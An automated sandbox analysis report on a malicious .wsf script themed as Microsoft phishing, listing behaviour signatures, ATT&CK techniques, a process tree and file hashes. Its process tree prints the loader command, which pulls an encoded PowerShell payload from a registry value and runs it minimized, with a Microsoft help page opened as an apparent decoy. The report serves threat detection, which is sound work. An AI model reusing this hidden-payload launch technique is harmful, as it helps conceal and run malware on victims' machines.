466cf0832a24b9a900aa36431f7fd69647c172c1c8054e233c473e83e50aa18f

Analysis

max time kernel
121s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
24-03-2023 11:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

chuhraFondled/longeveEctocondyle/UndersortPodalgia.wsf
Size

308KB
MD5

1dcf754fad54c2b87a00606217d004db
SHA1

a10b9e0d84058df4c8e61f9ec9a9a453640e9f60
SHA256

1b6f1d744c48df52231fe303f3c2911b3daf8b6e849d026916ced7e98948b946
SHA512

311d63d4c3cc24607380c93b4828d6bfa99ba981e598c4e5ce996c462a9eb90ca0f132687888045754a18a982cfb9ae3101737cdee52a21bae942c07f2a3e2c9
SSDEEP

6144:sU+pm3bu/2htEx/ooE1XRiXIJ4H/qYCWsh96bioMUv/76BPBoLFFaZDe9tNBq:sU+OZtJ4XIPcuozrzCf

Score

7^/10

microsoft phishing

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation WScript.exe
Detected potential entity reuse from brand microsoft.
phishing microsoft

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\d6289721-c6b9-4b1b-aa9e-ebf7fc2d2c44.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230324122330.pma	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exemsedge.exemsedge.exeidentity_helper.exe

pid	process
4316	powershell.exe
4316	powershell.exe
2372	powershell.exe
4568	msedge.exe
4568	msedge.exe
3348	msedge.exe
3348	msedge.exe
556	identity_helper.exe
556	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

Processes:

msedge.exe

pid process

3348 msedge.exe
3348 msedge.exe
3348 msedge.exe
3348 msedge.exe
3348 msedge.exe
3348 msedge.exe
3348 msedge.exe
3348 msedge.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4316 powershell.exe
Token: SeDebugPrivilege 2372 powershell.exe
Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

msedge.exe

pid process

3348 msedge.exe
3348 msedge.exe
3348 msedge.exe

pid	process
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe

description	pid	process
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeDebugPrivilege	2372	powershell.exe

pid	process
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.execmd.exemsedge.exe

description	pid	process	target process
PID 2460 wrote to memory of 4316	2460	WScript.exe	powershell.exe
PID 2460 wrote to memory of 4316	2460	WScript.exe	powershell.exe
PID 2460 wrote to memory of 4444	2460	WScript.exe	cmd.exe
PID 2460 wrote to memory of 4444	2460	WScript.exe	cmd.exe
PID 4316 wrote to memory of 2372	4316	powershell.exe	powershell.exe
PID 4316 wrote to memory of 2372	4316	powershell.exe	powershell.exe
PID 4444 wrote to memory of 3348	4444	cmd.exe	msedge.exe
PID 4444 wrote to memory of 3348	4444	cmd.exe	msedge.exe
PID 3348 wrote to memory of 3284	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 3284	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 460	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 4568	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 4568	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 2432	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 2432	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 2432	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 2432	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 2432	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 2432	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 2432	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 2432	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 2432	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 2432	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 2432	3348	msedge.exe	msedge.exe
PID 3348 wrote to memory of 2432	3348	msedge.exe	msedge.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\chuhraFondled\longeveEctocondyle\UndersortPodalgia.wsf"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $tripod = Get-ItemProperty -Path HKCU:\SOFTWARE\tripod | %{$_.UnrespectablyOvershot}; powershell -windowstyle Minimized -encodedcommand $tripod
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle Minimized -encodedcommand
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2372

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start https://learn.microsoft.com/microsoft-365/troubleshoot/
2⤵
- Suspicious use of WriteProcessMemory
PID:4444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://learn.microsoft.com/microsoft-365/troubleshoot/
3⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa84b146f8,0x7ffa84b14708,0x7ffa84b14718
4⤵
PID:3284

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2016,8962065670502470100,3352383033967764799,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2036 /prefetch:2
4⤵
PID:460

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2016,8962065670502470100,3352383033967764799,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2016,8962065670502470100,3352383033967764799,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
4⤵
PID:2432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,8962065670502470100,3352383033967764799,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:1
4⤵
PID:3964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,8962065670502470100,3352383033967764799,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:1
4⤵
PID:2416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,8962065670502470100,3352383033967764799,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
4⤵
PID:2308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,8962065670502470100,3352383033967764799,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
4⤵
PID:4780

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2016,8962065670502470100,3352383033967764799,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3808 /prefetch:8
4⤵
PID:3756

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
4⤵
- Drops file in Program Files directory
PID:3732

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7a8ab5460,0x7ff7a8ab5470,0x7ff7a8ab5480
5⤵
PID:4844

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2016,8962065670502470100,3352383033967764799,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3808 /prefetch:8
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,8962065670502470100,3352383033967764799,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
4⤵
PID:4248

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,8962065670502470100,3352383033967764799,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
4⤵
PID:1916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,8962065670502470100,3352383033967764799,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:1
4⤵
PID:2280

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,8962065670502470100,3352383033967764799,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
4⤵
PID:1824

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2616

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
cd488961db34aaa8ef3178208699448e

SHA1
a32ca7998015f97e09c1245bed2791e9c0ec81f9

SHA256
59804d7599fb39235424f498e5fa4cd2434b2a924f37d60f842ea4a536e390ad

SHA512
59ab7742cb29fa66c86b3ebe63605de647b4e1d874523eb95dac2d4c8db88c65afb906315fe43ebe69bbe2b9087cf4ffea977605aac7d2eb39fbf698ee0c005e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
b8c9383861d9295966a7f745d7b76a13

SHA1
d77273648971ec19128c344f78a8ffeb8a246645

SHA256
b75207c223dfc38fbb3dbf03107043a7dce74129d88053c9316350c97ac26d2e

SHA512
094e6978e09a6e762022e8ff57935a26b3171a0627639ca91a373bddd06092241d695b9f3b609ba60bc28e78a5c78cf0f072d79cd5769f1b9f6d873169f0df14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
91fa8f2ee8bf3996b6df4639f7ca34f7

SHA1
221b470deb37961c3ebbcc42a1a63e76fb3fe830

SHA256
e8e0588b16d612fa9d9989d16b729c082b4dd9bfca62564050cdb8ed03dd7068

SHA512
5415cd41f2f3bb5d9c7dadc59e347994444321cf8abe346b08e8c5a3fc6a5adae910eda43b4251ba4e317fbb7696c45dba9fd5e7fa61144c9b947206c7b999c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
48B

MD5
83e4272724f68c472a4328bc447a27aa

SHA1
4797c6ba983eb9bfacc8685bd51930a9e5557019

SHA256
abf1db2fc4c491bffc7aed34630d84c9e9a94bde841764b6ef6548e733b17d95

SHA512
745b40d5c88089f0b6e7f957ea90dcb6bc751b9efe6e5b15ea5824f55837c24547be44d695be8a8ddc251ae081083495964220327cff9d9824a2091ca758323a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
144B

MD5
cee4afcb164f75f0d6318ad4db451749

SHA1
61dd69fd8db17bd7defe5b1867a7eba80a0edd43

SHA256
3f7c44d279a379ded0dc9e2d1dd0f43ca1a9ba75010e1fcbd5db53827518f132

SHA512
54e405c38887ebdf056f9da4424895af89fb3c2309e136753e3b90dc0db787f6f06700b1f3375d3a252e948d63a09f3964a9dcbc06204d0811050b50bf7a4193

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1
Filesize
264KB

MD5
2ae443611755a2254b0ca1f7649f49fb

SHA1
02dc36005f48e6f6cc9b94cbfb2f0b6be68849fb

SHA256
13c38185883afa4aa8c49a1ac81145c6b8b4b11f22f342dfd87ca441f8a785c1

SHA512
86af4d6594500f5e3d6ab029d4777b5fb529f2311608cdca034a2f96ad272fc16e94f665c845d966eed0fc876a044f12d317bcfc4b7dcbcbae59808c6da87506

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
Filesize
2KB

MD5
41c2d22f7fbd6fe265699a5e41ab21e8

SHA1
1e317b53133948a85c20a18e33d4801b5d9d0783

SHA256
0b85a6d9e5c45f1975bf844cf0e3a58608e11452caf670f3f34f50998160b9f2

SHA512
4bfc8a95cbf787b0b7f7b80e0f89cc6bd900a973a3eca8fc36e4c8837923f31612b0afe149cf58bfd0ba7c376f8d4795014fdc1252f162be9ba8df03e785d2fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
488B

MD5
1e8119deb7959012f5917c1347036398

SHA1
4b7c0b41c9e6cfd7701d86e6ba740222113ebd80

SHA256
83dd270b0a82615c8d97e12584be2d9cc0cc4b47849bbe35e9783f98704c5ee8

SHA512
c9c010b5113e87c998e01f06eb6eac66137029ee71650a9093200a770d16a577b5c61312544dbdb4f3fb4102816987790311ed8f7bf7c037e22eab97ad254849

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
a1ed0f410029e2fb556db04f9912c003

SHA1
effe5b7309b7a21480912e5970a7745cec04e2d1

SHA256
992720b7d57f7203992aed1ac35edc6da8434f6e50260666b88606acc91bd532

SHA512
318d4e6a67da6e2b799e2eb312097b23f851cdcc84023b12cf28341673516ccfd079ff5647299f4c7500d83ebd65241adf58f63bfab83e026f762ddc68acc972

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
4KB

MD5
db6abd50057c3d7babd1ae4b1ee0c9f8

SHA1
6b27894163beba01b7dd6704cb1b655ad4203d5e

SHA256
f460d905d10dac013227b1d3a9fceafe571bf4dc379512834338ddabe5239ebf

SHA512
7c3da4a09cc3158babc8ce9832bac0a2000d88bc06c3b222f0b0a1c12f2f69f2faad8fe19138ff4f251e8dd9b34187176dd9ed2e71fb225291d69b68ad6d5ef2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
e73fba42aa0ac461e6cfe2d83500a03d

SHA1
4261025f113029c86c20608039e6cf13b5c8ed80

SHA256
1c4d07fa5021ef9842a52e317cff4de3ccd9cc1102bcede4ca4c404944d28e38

SHA512
7e36c7544e0c620c389c5c1e70da23818197d8b08bf170e40527b5e73fac4607869f68bebb4b27366bd07c8f725bc5ef6a36747cbab3ed9ba050a6a9739c77f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
bdd2f31f2b93cd274d3265913bd6b9c2

SHA1
ad80ff20fc74c95df518f24f5ef902060a8fb8e5

SHA256
d342a3c9da6ebec8b2ec43713a5b4a2e668740cc4a3a79759b7a1000bce142e8

SHA512
ab88eb50895020da1f21809307f4e8e1ef8289ca4c5be92484fe208122ceafd9c0120d0cc7f988a68acb5599d28777c8f04e5891b3b3f43f6f9d755b90e74e43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
Filesize
24KB

MD5
60b345592703258c513cb5fc34a2f835

SHA1
39991bd7ea37e2fc394be3b253ef96ce04088a6d

SHA256
7e358b4f7553c9385e8eb2c5692d426bc257bbd4c0213e6c69294459734f6300

SHA512
0346fb4096eb285ab0fdf7e7ec38c4daf7bbb0c506f09975eb2290121d169a34c886fca342c3e06371cb697f2753a697ca4f72af7817ed340eee6063897110a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
371B

MD5
2f4159a42dec2325fe63753a2bec6f27

SHA1
5145b1b93a7ac1b7302c15cc2ccff7ecdf6da06b

SHA256
ff9962d98d653308aad94fd3b58fc62269cae9a5c00ed0e5e2f9e3754b6ba445

SHA512
f4223f495d3a2e4aadae6b8feba92ae8a6f5f6a04757bf4eac3b394265865ed6c3deb1f7433c5dcf690986115efee8f0d9c129028e08b9bd668b8c0722ffb46c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe584bf8.TMP
Filesize
371B

MD5
62e24aa2c7046d51ead623c56429081c

SHA1
97b3654aa860e290f28eb21a31458adcd675cdd3

SHA256
2721966c992e4cb7bad44b6d356ac6fe8070a8c50ffd80082758260cebd0b204

SHA512
4fb4bcc961c8b0d2aa1c501bd624ded99709a339e1f0ea2c3c0c62d6d332aa7ecca81e7e6e59255f8f1da7260135bd35c329a9f5ec78313e89f2a2e8c3048f0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001
Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
9KB

MD5
cd2d14eaf2fae003d6f43d8c3e1d8f78

SHA1
5b578559b479d22499cc32dc99d4b97203a4ed5b

SHA256
84b2f1b48716ad06fa79f76a6f374097a23b3aff988fc8e2a4e993156ee687eb

SHA512
88ee51d22a9b76a1612ee53118965d39420dd1666a7df824044303827db439305d95e7e2777ad659637bb0d65e598205cffab4660ac2405dabf28dd6bd85d3b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
1fc5ac25e4dac84ce2114c78dbbad8a6

SHA1
7fd75dfe524739d3391b2f75de2c693f3cba0333

SHA256
0c78fc1dfb7b84ba777ad55939de799822fd59fb895d1f6afce67cc33baff5fd

SHA512
83f8212dcac3c51c3deee0de2816b56148712972019645cfa748cede8161f04299c8bdbd1d4d6b6d21bcb11353f64294e30f9305fc4a611269e3ff11b4698f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
13KB

MD5
92b3053dba9054a1f27890bcf09a0daf

